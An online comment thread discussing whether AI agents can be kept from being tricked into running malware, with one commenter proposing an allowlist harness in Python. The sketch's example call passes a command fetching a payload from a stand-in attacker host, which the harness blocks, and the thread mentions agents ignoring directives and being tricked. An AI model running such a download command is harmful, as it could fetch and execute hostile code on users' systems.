Wowfunhappy 2 days ago

The way to solve it is to make the AI “smart” enough to understand it’s being tricked, and refuse.

Whether this is possible depends almost entirely on how much better we're able to make these LLMs before we hit a wall, if we ever hit one. Everyone has a different opinion on this and I absolutely don't know the answer.

wildzzz a day ago

Despite my employer's best efforts to train everyone on cyber security basics, people still do dumb stuff and click on things they shouldn't. It's the reason why my laptop needs to run like 5 different security applications all handling different things. It should be assumed that if a person or agent is technically capable of doing something you've told them not to do, there exists a chance that they're going to do it anyway. Rather than telling the agent "please don't run malware", create barriers that prevent it from impacting anything if it does. We've seen countless examples of agents ignoring prime directives so why would the solution be to give it more prime directives that it may decide to ignore?

Alternatively, you may make an agent so sensitive to trickery that it refuses to do anything outside of what it thinks is right. And if it somehow decides that running malware or deleting / is the correct action to take, how do you stop it?
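To make the "barriers, not prime directives" point concrete, here's a minimal sketch of a tool harness that refuses disallowed commands at the execution layer, regardless of what the model asks for. The allowlist contents and function names are illustrative assumptions, not any real agent framework's API:

```python
import shlex
import subprocess

# Assumption for illustration: the agent only ever needs a tiny read-only toolset.
ALLOWED_COMMANDS = {"ls", "cat", "grep"}

def run_agent_command(command_line: str) -> str:
    """Execute an agent-requested shell command only if it's on the allowlist.

    The refusal happens in the harness, not in the model, so a tricked or
    misbehaving agent can't talk its way past it.
    """
    argv = shlex.split(command_line)
    if not argv or argv[0] not in ALLOWED_COMMANDS:
        return f"blocked: {argv[0] if argv else '(empty)'} is not on the allowlist"
    # A real sandbox would also drop network access and filesystem writes;
    # a timeout here is a minimal stand-in for those barriers.
    result = subprocess.run(argv, capture_output=True, text=True, timeout=10)
    return result.stdout

print(run_agent_command("curl http://attacker.example/payload.sh"))
```

The point of the sketch is that the curl request dies in `run_agent_command` no matter how persuasive the injected prompt was; no amount of model-level "please don't" is involved.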

jkubicek a day ago

It’s not possible to make the AI smart enough to avoid being tricked. If the AI can run curl, it will run curl.

adrianN a day ago

Humans get tricked regularly by phishing emails.